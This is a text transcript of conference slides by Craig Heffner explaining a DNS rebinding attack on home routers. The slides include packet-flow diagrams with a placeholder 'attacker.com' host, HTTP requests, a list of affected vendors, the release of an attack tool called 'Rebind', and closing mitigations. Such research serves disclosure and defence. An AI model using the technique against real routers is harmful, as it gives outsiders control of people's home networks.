how to hack millions of routers - formación | eventos | aulas · multiple a record attack better...
TRANSCRIPT
![Page 1: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/1.jpg)
How to Hack Millions of Routers
Craig Heffner, Seismic LLC
![Page 2: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/2.jpg)
SOHO Router…Security?
![Page 3: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/3.jpg)
Common Attack Techniques
Cross Site Request Forgery
No trust relationship between browser and router
Can’t forge Basic Authentication credentials
Anti-CSRF
Limited by the same origin policy
DNS Rebinding
Rebinding prevention by OpenDNS / NoScript / DNSWall
Most rebinding attacks no longer work
Most…
![Page 4: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/4.jpg)
Multiple A Record Attack
Better known as DNS load balancing / redundancy
Return multiple IP addresses in DNS response
Browser attempts to connect to each IP addresses in order
If one IP goes down, browser switches to the next IP in the list
Limited attack
Can rebind to any public IP address
Can’t rebind to an RFC1918 IP addresses
![Page 5: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/5.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
Target IP: 2.3.5.8
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
![Page 6: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/6.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
What is the IP address for
attacker.com?
![Page 7: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/7.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
1.4.1.4
2.3.5.8
![Page 8: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/8.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
![Page 9: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/9.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
<script>…</script>
![Page 10: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/10.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
![Page 11: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/11.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
TCP RST
![Page 12: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/12.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
![Page 13: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/13.jpg)
Rebinding to a Public IP
1.4.1.4
2.3.5.8
<html>…</html>
![Page 14: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/14.jpg)
Rebinding to a Private IP
1.4.1.4
Target IP: 192.168.1.1
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
192.168.1.1
![Page 15: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/15.jpg)
Rebinding to a Private IP
1.4.1.4
What is the IP address for
attacker.com?
192.168.1.1
![Page 16: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/16.jpg)
Rebinding to a Private IP
1.4.1.4
1.4.1.4
192.168.1.1
192.168.1.1
![Page 17: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/17.jpg)
Rebinding to a Private IP
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
192.168.1.1
![Page 18: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/18.jpg)
Rebinding to a Private IP
1.4.1.4
<html>…</html>
192.168.1.1
![Page 19: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/19.jpg)
Services Bound to All Interfaces
# netstat –l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
![Page 20: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/20.jpg)
Firewall Rules Based on Interface Names
-A INPUT –i etho –j DROP
-A INPUT –j ACCEPT
![Page 21: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/21.jpg)
IP Stack Implementations
RFC 1122 defines two IP models:
Strong End System Model
Weak End System Model
![Page 22: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/22.jpg)
The Weak End System Model
RFC 1122, Weak End System Model:
A host MAY silently discard an incoming datagram whose
destination address does not correspond to the physical
interface through which it is received.
A host MAY restrict itself to sending (non-source-routed) IP
datagrams only through the physical interface that corresponds
to the IP source address of the datagrams.
![Page 23: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/23.jpg)
Weak End System Model
eth1
192.168.1.1
eth0
2.3.5.8
![Page 24: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/24.jpg)
Weak End System Model
TCP SYN Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
![Page 25: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/25.jpg)
Weak End System Model
TCP SYN/ACK Packet
Source IP: 2.3.5.8
Destination IP: 192.168.1.100
Source Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
![Page 26: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/26.jpg)
Weak End System Model
TCP ACK Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
![Page 27: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/27.jpg)
Traffic Capture
![Page 28: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/28.jpg)
End Result
![Page 29: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/29.jpg)
Public IP Rebinding Attack
1.4.1.4
Target IP: 2.3.5.8
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
2.3.5.8
![Page 30: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/30.jpg)
Public IP Rebinding Attack
1.4.1.4
What is the IP address for
attacker.com?
2.3.5.8
![Page 31: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/31.jpg)
Public IP Rebinding Attack
1.4.1.4
1.4.1.4
2.3.5.8
2.3.5.8
![Page 32: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/32.jpg)
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
![Page 33: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/33.jpg)
Public IP Rebinding Attack
1.4.1.4
<script>...</script>
2.3.5.8
![Page 34: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/34.jpg)
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
![Page 35: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/35.jpg)
Public IP Rebinding Attack
1.4.1.4
TCP RST
2.3.5.8
![Page 36: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/36.jpg)
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
![Page 37: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/37.jpg)
Public IP Rebinding Attack
1.4.1.4
<html>…</html>
2.3.5.8
![Page 38: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/38.jpg)
Public IP Rebinding Attack
Pros:
Nearly instant rebind, no delay or waiting period
Don’t need to know router’s internal IP
Works in all major browsers: IE, FF, Opera, Safari, Chrome
Cons:
Router must meet very specific conditions
Must bind Web server to the WAN interface
Firewall rules must be based on interface names, not IP addresses
Must implement the weak end system model
Not all routers are vulnerable
![Page 39: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/39.jpg)
Affected Routers
![Page 40: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/40.jpg)
Asus
![Page 41: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/41.jpg)
Belkin
![Page 42: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/42.jpg)
Dell
![Page 43: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/43.jpg)
Thompson
![Page 44: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/44.jpg)
Linksys
![Page 45: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/45.jpg)
Third Party Firmware
![Page 46: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/46.jpg)
ActionTec
![Page 47: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/47.jpg)
Making the Attack Practical
To make the attack practical:
Must obtain target’s public IP address automatically
Must coordinate services (DNS, Web, Firewall)
Must do something useful
![Page 48: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/48.jpg)
Tool Release: Rebind
Provides all necessary services
DNS, Web, Firewall
Serves up JavaScript code
Limits foreground activity
Makes use of cross-domain XHR, if supported
Supports all major Web browsers
Attacker can browse target routers in real-time
Via a standard HTTP proxy
![Page 49: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/49.jpg)
Rebind
2.3.5.8 1.4.1.4
Target IP: 2.3.5.8
Rebind IP: 1.4.1.4
Attacker Domain: attacker.com
![Page 50: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/50.jpg)
Rebind
![Page 51: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/51.jpg)
Rebind
![Page 52: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/52.jpg)
Rebind
2.3.5.8 1.4.1.4
What is the IP address for
attacker.com?
![Page 53: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/53.jpg)
Rebind
2.3.5.8 1.4.1.4
1.4.1.4
![Page 54: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/54.jpg)
Rebind
2.3.5.8 1.4.1.4
GET /init HTTP/1.1
Host: attacker.com
![Page 55: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/55.jpg)
Rebind
2.3.5.8 1.4.1.4
Location: http://wacme.attacker.com/exec
![Page 56: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/56.jpg)
Rebind
2.3.5.8 1.4.1.4
What is the IP address for
wacme.attacker.com?
![Page 57: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/57.jpg)
Rebind
2.3.5.8 1.4.1.4
1.4.1.4
2.3.5.8
![Page 58: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/58.jpg)
Rebind
2.3.5.8 1.4.1.4
GET /exec HTTP/1.1
Host: wacme.attacker.com
![Page 59: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/59.jpg)
Rebind
2.3.5.8 1.4.1.4
<script>…</script>
![Page 60: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/60.jpg)
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
![Page 61: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/61.jpg)
Rebind
2.3.5.8 1.4.1.4
TCP RST
![Page 62: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/62.jpg)
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
![Page 63: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/63.jpg)
Rebind
2.3.5.8 1.4.1.4
<html>…</html>
![Page 64: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/64.jpg)
Rebind
2.3.5.8 1.4.1.4
GET /poll HTTP/1.1
Host: attacker.com:81
![Page 65: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/65.jpg)
Rebind
2.3.5.8 1.4.1.4
![Page 66: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/66.jpg)
Rebind
![Page 67: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/67.jpg)
Rebind
2.3.5.8 1.4.1.4
GET http://2.3.5.8/ HTTP/1.1
![Page 68: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/68.jpg)
Rebind
2.3.5.8 1.4.1.4
GET /poll HTTP/1.1
Host: attacker.com:81
![Page 69: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/69.jpg)
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1
![Page 70: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/70.jpg)
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
![Page 71: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/71.jpg)
Rebind
2.3.5.8 1.4.1.4
<html>…</html>
![Page 72: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/72.jpg)
Rebind
2.3.5.8 1.4.1.4
POST /exec HTTP/1.1
Host: attacker.com:81
<html>…</html>
![Page 73: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/73.jpg)
Rebind
2.3.5.8 1.4.1.4
<html>…</html>
![Page 74: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/74.jpg)
Rebind
![Page 75: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/75.jpg)
Demo
![Page 76: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/76.jpg)
More Fun With Rebind
Attacking SOAP services
UPnP
HNAP
We can rebind to any public IP
Proxy attacks to other Web sites via your browser
As long as the site doesn’t check the host header
![Page 77: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/77.jpg)
DNS Rebinding Countermeasures
![Page 78: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/78.jpg)
Am I Vulnerable?
![Page 79: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/79.jpg)
End-User Mitigations
Break any of the attack’s conditions
Interface binding
Firewall rules
Routing rules
Disable the HTTP administrative interface
Reduce the impact of the attack
Basic security precautions
![Page 80: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/80.jpg)
Blocking Attacks at the Router
Don’t bind services to the external interface
May not have sufficient access to the router to change this
Some services don’t give you a choice
Re-configure firewall rules
-A INPUT –i eth1 –d 172.69.0.0/16 –j DROP
![Page 81: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/81.jpg)
HTTP Administrative Interface
Disable the HTTP interface
Use HTTPS / SSH
Disable UPnP while you’re at it
But be warned…
Enabling HTTPS won’t disable HTTP
In some routers you can’t disable HTTP
Some routers have HTTP listening on alternate ports
In some routers you can’t disable HNAP
![Page 82: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/82.jpg)
Blocking Attacks at the Host
Re-configure firewall rules
-A INPUT –d 172.69.0.0/16 –j DROP
Configure dummy routes
route add -net 172.69.0.0/16 gw 127.0.0.1
![Page 83: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/83.jpg)
Basic Security Precautions
Change your router’s default password
Keep your firmware up to date
Don’t trust un-trusted content
